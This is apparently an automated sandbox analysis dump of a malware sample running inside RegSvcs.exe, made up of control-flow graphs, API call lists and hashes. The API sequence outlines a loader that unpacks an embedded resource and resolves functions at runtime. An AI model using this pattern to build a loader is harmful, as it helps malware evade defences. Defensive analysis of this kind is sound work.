64d5fa0 CallWindowProcW 32004->32008 32005->32005 32006->32005 32007->32005 32008->32005 32010 64d500e 32009->32010 32011 64d2abc CallWindowProcW 32010->32011 32012 64d502f 32011->32012 32012->31982 32014 64d602a 32013->32014 32015 64d607a 32013->32015 32033 64d6058 32014->32033 32036 64d604a 32014->32036 32016 64d6040 32016->31996 32021 64d5fb4 32019->32021 32020 64d6040 32020->31996 32022 64d6058 CallWindowProcW 32021->32022 32023 64d604a CallWindowProcW 32021->32023 32022->32020 32023->32020 32026 64d5fa1 32024->32026 32025 64d6040 32025->31996 32027 64d6058 CallWindowProcW 32026->32027 32028 64d604a CallWindowProcW 32026->32028 32027->32025 32028->32025 32030 64d2bef 32029->32030 32031 64d755a CallWindowProcW 32030->32031 32032 64d7509 32030->32032 32031->32032 32032->31996 32034 64d6069 32033->32034 32040 64d7447 32033->32040 32034->32016 32037 64d6058 32036->32037 32038 64d6069 32037->32038 32039 64d7447 CallWindowProcW 32037->32039 32038->32016 32039->32038 32041 64d7498 32040->32041 32044 64d744b 32040->32044 32042 64d2be4 CallWindowProcW 32041->32042 32043 64d74aa 32042->32043 32043->32034 32044->32034 32045 2930d78 32046 2930d84 32045->32046 32047 2930d8f 32046->32047 32049 293364d 32046->32049 32052 293f340 32049->32052 32054 293f367 32052->32054 32056 293f458 32054->32056 32057 293f4a1 VirtualProtect 32056->32057 32059 293366c 32057->32059 32382 293f728 32383 293f76c CloseHandle 32382->32383 32385 293f7b8 32383->32385 32060 64d2340 32061 64d2471 32060->32061 32062 64d2371 32060->32062 32063 64d237d 32062->32063 32069 64d25a9 32062->32069 32074 64d25b8 32062->32074 32064 64d23bd 32078 64d3d9f 32064->32078 32087 64d3db0 32064->32087 32070 64d25b8 32069->32070 32096 64d2608 32070->32096 32106 64d25f8 32070->32106 32071 64d25c2 32071->32064 32076 64d2608 2 API calls 32074->32076 32077 64d25f8 2 API calls 32074->32077 32075 64d25c2 32075->32064 32076->32075 32077->32075 32079 64d3ddb 32078->32079 32126 64d42d1 32079->32126 32131 64d4300 32079->32131 32080 64d3e5e 32081 64d15d0 GetModuleHandleW 32080->32081 32083 64d3e8a 32080->32083 32082 64d3ece 32081->32082 32084 64d4d00 CreateWindowExW 32082->32084 32084->32083 32088 64d3ddb 32087->32088 32093 64d42d1 GetModuleHandleW 32088->32093 32094 64d4300 GetModuleHandleW 32088->32094 32089 64d3e5e 32090 64d15d0 GetModuleHandleW 32089->32090 32092 64d3e8a 32089->32092 32091 64d3ece 32090->32091 32156 64d4d00 32091->32156 32093->32089 32094->32089 32097 64d2619 32096->32097 32100 64d263c 32096->32100 32116 64d15d0 32097->32116 32100->32071 32101 64d285d GetModuleHandleW 32103 64d289c 32101->32103 32102 64d2634 32102->32100 32102->32101 32103->32071 32107 64d2619 32106->32107 32110 64d263c 32106->32110 32108 64d15d0 GetModuleHandleW 32107->32108 32109 64d2624 32108->32109 32109->32110 32114 64d28d8 GetModuleHandleW 32109->32114 32115 64d28e8 GetModuleHandleW 32109->32115 32110->32071 32111 64d285d GetModuleHandleW 32113 64d289c 32111->32113 32112 64d2634 32112->32110 32112->32111 32113->32071 32114->32112 32115->32112 32117 64d27f8 GetModuleHandleW 32116->32117 32119 64d2624 32117->32119 32119->32100 32120 64d28e8 32119->32120 32123 64d28d8 32119->32123 32121 64d28fc 32120->32121 32122 64d15d0 GetModuleHandleW 32120->32122 32121->32102 32122->32121 32124 64d15d0 GetModuleHandleW 32123->32124 32125 64d28fc 32124->32125 32125->32102 32127 64d4300 32126->32127 32128 64d43ae 32127->32128 32136 64d4470 32127->32136 32146 64d4462 32127->32146 32132 64d432d 32131->32132 32133 64d43ae 32132->32133 32134 64d4470 GetModuleHandleW 32132->32134 32135 64d4462 GetModuleHandleW 32132->32135 32134->32133 32135->32133 32137 64d4485 32136->32137 32138 64d15d0 GetModuleHandleW 32137->32138 32140 64d44a9 32137->32140 32138->32140 32139 64d4665 32139->32128 32140->32139 32141 64d15d0 GetModuleHandleW 32140->32141 32142 64d45eb 32141->32142 32142->32139 32143 64d15d0 GetModuleHandleW 32142->32143 32144 64d4639 32143->32144 32144->32139 32145 64d15d0 GetModuleHandleW 32144->32145 32145->32139 32147 64d4470 32146->32147 32148 64d15d0 GetModuleHandleW 32147->32148 32149 64d44a9 32147->32149 32148->32149 32150 64d15d0 GetModuleHandleW 32149->32150 32155 64d4665 32149->32155 32151 64d45eb 32150->32151 32152 64d15d0 GetModuleHandleW 32151->32152 32151->32155 32153 64d4639 32152->32153 32154 64d15d0 GetModuleHandleW 32153->32154 32153->32155 32154->32155 32155->32128 32159 64d2a94 32156->32159 32160 64d4d50 CreateWindowExW 32159->32160 32162 64d4f26 32160->32162

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 13 401c73-401c77 8->13 15 401c93-401c95 13->15 16 401c79-401c7b 13->16 20 401c98-401c9a 15->20 18 401c7d-401c83 16->18 19 401c8f-401c91 16->19 18->15 22 401c85-401c8d 18->22 19->20 23 401cb0-401cce call 401650 20->23 24 401c9c-401caf CloseHandle 20->24 22->13 22->19 34 401cd0-401cd4 23->34 30 401ef3-401f1a call 401300 SizeofResource 26->30 27->30 39 401f1c-401f2f 30->39 40 401f5f-401f69 30->40 36 401cf0-401cf2 34->36 37 401cd6-401cd8 34->37 38 401cf5-401cf7 36->38 41 401cda-401ce0 37->41 42 401cec-401cee 37->42 38->24 43 401cf9-401d09 Module32Next 38->43 44 401f33-401f5d call 401560 39->44 45 401f73-401f75 40->45 46 401f6b-401f72 40->46 41->36 47 401ce2-401cea 41->47 42->38 43->7 48 401d0f 43->48 44->40 50 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 45->50 51 401f77-401f8d call 401560 45->51 46->45 47->34 47->42 53 401d10-401d2e call 401650 48->53 50->5 87 4021aa-4021c0 50->87 51->50 61 401d30-401d34 53->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 70 401d42-401d4a 66->70 67->68 68->24 71 401d5d-401d7b call 401650 68->71 70->61 70->67 76 401d80-401d84 71->76 78 401da0-401da2 76->78 79 401d86-401d88 76->79 83 401da5-401da7 78->83 81 401d8a-401d90 79->81 82 401d9c-401d9e 79->82 81->78 85 401d92-401d9a 81->85 82->83 83->24 86 401dad-401dbd Module32Next 83->86 85->76 85->82 86->7 86->53 89 4021c6-4021ca 87->89 90 40246a-402470 87->90 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 152 40234e call 277d007 122->152 153 40234e call 277d01d 122->153 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 154 402390 call 277d007 135->154 155 402390 call 277d01d 135->155 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->127 153->127 154->138 155->138
                                                                APIs
                                                                • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                • _getenv.LIBCMT ref: 00401ABA
                                                                • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                • Module32First.KERNEL32 ref: 00401C48
                                                                • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                • CloseHandle.KERNELBASE(00000000), ref: 00401DC4
                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                • _malloc.LIBCMT ref: 00401EBA
                                                                • _memset.LIBCMT ref: 00401EDD
                                                                • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                • API String ID: 1430744539-2962942730
                                                                • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: N
                                                                • API String ID: 0-1130791706
                                                                • Opcode ID: cc49c74a82b3c4ca41230f29b6cb6fea763b26aea2c7b4cc75b69d4c3c91f489
                                                                • Instruction ID: 344a5f9204967a6f0a1ae4b2caaa3904eb51e0997d44ff61de15ec711b551bd5
                                                                • Opcode Fuzzy Hash: cc49c74a82b3c4ca41230f29b6cb6fea763b26aea2c7b4cc75b69d4c3c91f489
                                                                • Instruction Fuzzy Hash: 9D73D531D10B5A8ECB11EF68C854A9DFBB1FF99300F15D69AE44967221EB70AAC4CF41
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: K
                                                                • API String ID: 0-856455061
                                                                • Opcode ID: f6f99cece0944c7ae04d85de789f375c5139c4318f39d60d8703e073c6f2aa8c
                                                                • Instruction ID: 7cdf55419e728e8a44ff86db3bacde60b7a87802468e89d4114d9125ec458054
                                                                • Opcode Fuzzy Hash: f6f99cece0944c7ae04d85de789f375c5139c4318f39d60d8703e073c6f2aa8c
                                                                • Instruction Fuzzy Hash: A333E431D14B198EDB11EF68D854A9DFBB1FF99300F10D69AE54867221EB70AAC4CF81
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6c7aa975677eb9d4c75aa9f48b95a4b46dec078d1f417666868a461e9d3b6b92
                                                                • Instruction ID: 054e0c5a58b72e88903f4daef70f20349b4278fd902168f86082d81b7e60d933
                                                                • Opcode Fuzzy Hash: 6c7aa975677eb9d4c75aa9f48b95a4b46dec078d1f417666868a461e9d3b6b92
                                                                • Instruction Fuzzy Hash: 62F1E474E01218CFDB14DFA9D884B9DBBB2BF88304F54C1A9E908AB355DB74A985CF50
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 69a7b711c48c1769b6103a8ec89c4f41c5006c59babcc9a32b4d19fc1150bfd8
                                                                • Instruction ID: 2fdbcbc5a9ed92225a0cc105cc37b188695fea484978e8c7ed7f9b669a2774d0
                                                                • Opcode Fuzzy Hash: 69a7b711c48c1769b6103a8ec89c4f41c5006c59babcc9a32b4d19fc1150bfd8
                                                                • Instruction Fuzzy Hash: 64C18F74E00218CFDB54DFA5D994B9DBBB2BF88301F2085A9D809A7365DB359E85CF10
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 46afeba3847b5432129cb941b2b6f5388b75fbf9b9c46ab7e2d870c23aaa2b52
                                                                • Instruction ID: 2f4aa0624235079d0a70b21e1d3a96c9c4ca69ba526591971f654d3275de7117
                                                                • Opcode Fuzzy Hash: 46afeba3847b5432129cb941b2b6f5388b75fbf9b9c46ab7e2d870c23aaa2b52
                                                                • Instruction Fuzzy Hash: 38A10370D00208CFDB24DFA9D998BDDBBB1FF88314F249269E509AB2A1DB705985CF51
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 876ff55644f4493674d07611bfb3c778941030cd0d3fb1931cc89bd64007fdcb
                                                                • Instruction ID: 88e9a73dfe4fc1923a8c24aead0d15d8ffdf05726fdbaaf41dc256137828e96a
                                                                • Opcode Fuzzy Hash: 876ff55644f4493674d07611bfb3c778941030cd0d3fb1931cc89bd64007fdcb
                                                                • Instruction Fuzzy Hash: 1891F370D00208CFDB20DFA8D988BDDBBB1FF49314F249669E509AB291DB749985CF54
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 76c88fa859c0913b6b289417ac1ccbf6b19388b330eee78c08c9101c2bd66c94
                                                                • Instruction ID: bdf2044a5b7de68503e9aaaad9f1d2dee5097d0fc687b1f22437fa68cc2103b6
                                                                • Opcode Fuzzy Hash: 76c88fa859c0913b6b289417ac1ccbf6b19388b330eee78c08c9101c2bd66c94
                                                                • Instruction Fuzzy Hash: FE41D370D01248CBDB18DFAAD95479EFBF2AF88300F24D52AD819BB654DB345945CF14

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 156 40cbf7-40cc06 157 40cc08-40cc14 156->157 158 40cc2f 156->158 157->158 159 40cc16-40cc1d 157->159 160 40cc33-40cc3d call 40d534 158->160 159->158 161 40cc1f-40cc2d 159->161 164 40cc47 160->164 165 40cc3f-40cc46 call 40cbb4 160->165 161->160 167 40cc47 call 41087e 164->167 165->164 169 40cc4c-40cc4e 167->169 170 40cc50-40cc57 call 40cbb4 169->170 171 40cc58-40cc68 call 4129c9 call 411a15 169->171 170->171 178 40cc72-40cc82 GetCommandLineA call 412892 171->178 179 40cc6a-40cc71 call 40e79a 171->179 184 40cc87 call 4127d7 178->184 179->178 185 40cc8c-40cc8e 184->185 186 40cc90-40cc97 call 40e79a 185->186 187 40cc98-40cc9f call 41255f 185->187 186->187 192 40cca1-40cca8 call 40e79a 187->192 193 40cca9-40ccb3 call 40e859 187->193 192->193 198 40ccb5-40ccbb call 40e79a 193->198 199 40ccbc-40ccd3 call 4019f0 193->199 198->199 203 40ccd8-40cce2 199->203 204 40cce4-40cce5 call 40ea0a 203->204 205 40ccea-40cd2e call 40ea36 call 40e21d 203->205 204->205
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
                                                                • String ID:
                                                                • API String ID: 2598563909-0
                                                                • Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                • Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
                                                                • Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                • Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 212 50f62f8-50f6301 213 50f630a-50f630d 212->213 214 50f6303-50f6308 212->214 215 50f630f-50f6314 213->215 216 50f6316-50f6319 213->216 217 50f6342-50f6345 214->217 215->217 218 50f631b-50f6320 216->218 219 50f6322-50f6325 216->219 218->217 220 50f632e-50f6331 219->220 221 50f6327-50f632c 219->221 222 50f633a-50f633d 220->222 223 50f6333-50f6338 220->223 221->217 224 50f633f 222->224 225 50f6346-50f63b6 222->225 223->217 224->217 232 50f63bb-50f63ca call 50f62a0 225->232 235 50f63cc-50f63e7 232->235 236 50f6413-50f6416 232->236 235->236 249 50f63e9-50f63ed 235->249 237 50f642c-50f645b 236->237 238 50f6418-50f641e 236->238 243 50f645d-50f6460 237->243 244 50f6467-50f646d 237->244 238->232 240 50f6420 238->240 241 50f6422-50f6429 240->241 243->244 246 50f6462-50f6465 243->246 247 50f646f-50f6472 244->247 248 50f6481-50f64b5 call 50f3a80 244->248 246->244 250 50f64b8-50f6510 246->250 247->248 251 50f6474-50f6476 247->251 252 50f63ef-50f63f4 249->252 253 50f63f6-50f63ff 249->253 258 50f6517-50f6597 250->258 251->248 254 50f6478-50f647b 251->254 252->241 253->236 255 50f6401-50f640a 253->255 254->248 254->258 255->236 259 50f640c-50f6411 255->259 278 50f6599-50f659d 258->278 279 50f65b7-50f660d 258->279 259->241 317 50f65a0 call 50f6398 278->317 318 50f65a0 call 50f62e8 278->318 319 50f65a0 call 50f62f8 278->319 320 50f65a0 call 50f6695 278->320 321 50f65a0 call 50f6661 278->321 285 50f660f-50f6616 279->285 286 50f6618-50f6621 279->286 280 50f65a3-50f65b4 287 50f6633-50f663c 285->287 288 50f662c 286->288 289 50f6623-50f662a 286->289 290 50f6642-50f665f 287->290 291 50f66d0-50f66d4 287->291 288->287 289->287 292 50f66dd-50f66f9 290->292 291->292 322 50f66d7 call 50f67e0 291->322 323 50f66d7 call 50f67f0 291->323 296 50f66fb-50f66fe 292->296 297 50f6700-50f675a call 50f3a90 292->297 296->297 298 50f6762-50f676b 296->298 297->298 299 50f676d-50f6770 298->299 300 50f6772-50f67a8 298->300 299->300 302 50f67d7-50f67dd 299->302 300->302 312 50f67aa-50f67cf call 50f3aa0 300->312 312->302 317->280 318->280 319->280 320->280 321->280 322->292 323->292
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8cq$Hbq$Hbq$Hbq$TJcq
                                                                • API String ID: 0-1895975235
                                                                • Opcode ID: 4406b4c90e40a5d195cb5473a38354c590561a789a1196d2ec89b10d195715bc
                                                                • Instruction ID: 001e38c9a6df415bb70f77656175338ede029df270e8db328ccf239236cdb40a
                                                                • Opcode Fuzzy Hash: 4406b4c90e40a5d195cb5473a38354c590561a789a1196d2ec89b10d195715bc
                                                                • Instruction Fuzzy Hash: 11D1E331B002048FCB15DB68D594AAE7BF6FF89320F244565E606EB7A1CA36EC45CB91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 324 4018f0-4018fa 325 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 324->325 326 4018fc-401900 324->326 329 401940-401949 GetLastError 325->329 330 401996-40199a 325->330 331 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 329->331 332 40198d-40198f 329->332 331->332 332->330 334 401991 call 401030 332->334 334->330
                                                                APIs
                                                                • lstrlenA.KERNEL32(?), ref: 00401906
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                • GetLastError.KERNEL32 ref: 00401940
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                • String ID:
                                                                • API String ID: 3322701435-0
                                                                • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 337 40af66-40af6e 338 40af7d-40af88 call 40b84d 337->338 341 40af70-40af7b call 40d2e3 338->341 342 40af8a-40af8b 338->342 341->338 345 40af8c-40af98 341->345 346 40afb3-40afca call 40af49 call 40cd39 345->346 347 40af9a-40afb2 call 40aefc call 40d2bd 345->347 347->346
                                                                APIs
                                                                • _malloc.LIBCMT ref: 0040AF80
                                                                  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                  • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                • String ID:
                                                                • API String ID: 1411284514-0
                                                                • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 356 50f5d70-50f5da7 call 50f5218 call 50f6090 361 50f5dad-50f5daf 356->361 362 50f5f83-50f5f8e 356->362 363 50f5f95-50f5fa0 361->363 364 50f5db5-50f5db9 361->364 362->363 370 50f5fa7-50f5fb2 363->370 364->363 365 50f5dbf-50f5df7 call 50f3a80 364->365 365->370 378 50f5dfd-50f5e01 365->378 374 50f5fb9-50f5fc4 370->374 379 50f5fcb-50f5ff7 374->379 380 50f5e0d-50f5e11 378->380 381 50f5e03-50f5e07 378->381 415 50f5ffe-50f602a 379->415 382 50f5e1c-50f5e20 380->382 383 50f5e13-50f5e1a 380->383 381->374 381->380 385 50f5e38-50f5e3c 382->385 386 50f5e22-50f5e26 382->386 383->385 387 50f5e3e-50f5e40 385->387 388 50f5e43-50f5e4a 385->388 390 50f5e28-50f5e2f 386->390 391 50f5e31 386->391 387->388 392 50f5e4c 388->392 393 50f5e53-50f5e57 388->393 390->385 391->385 396 50f5e8f-50f5e93 392->396 397 50f5f08-50f5f0b 392->397 398 50f5ea6-50f5ea9 392->398 399 50f5ed5-50f5ed8 392->399 400 50f5f71-50f5f7c 392->400 394 50f5e5d-50f5e61 393->394 395 50f5f36-50f5f39 393->395 394->400 404 50f5e67-50f5e6a 394->404 402 50f5f3b-50f5f3e 395->402 403 50f5f49-50f5f6c 395->403 439 50f5e96 call 50f6398 396->439 440 50f5e96 call 50f62e8 396->440 441 50f5e96 call 50f62f8 396->441 407 50f5f0d 397->407 408 50f5f12-50f5f31 397->408 409 50f5eab-50f5eae 398->409 410 50f5eb4-50f5ed3 398->410 405 50f5eda-50f5edd 399->405 406 50f5ee3-50f5f06 399->406 400->362 402->403 411 50f5f40-50f5f43 402->411 403->396 403->400 412 50f5e6c 404->412 413 50f5e71-50f5e8d 404->413 405->406 405->415 406->396 407->408 408->396 409->379 409->410 410->396 411->403 420 50f6031-50f606d 411->420 412->413 413->396 415->420 416 50f5e9c-50f5ea3 439->416 440->416 441->416
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $Hbq$Hbq$Hbq
                                                                • API String ID: 0-580995494
                                                                • Opcode ID: dd8f5dff6a7f520f3e9e333588269fc44e7b99c4f2711bfeed769d40f1a88900
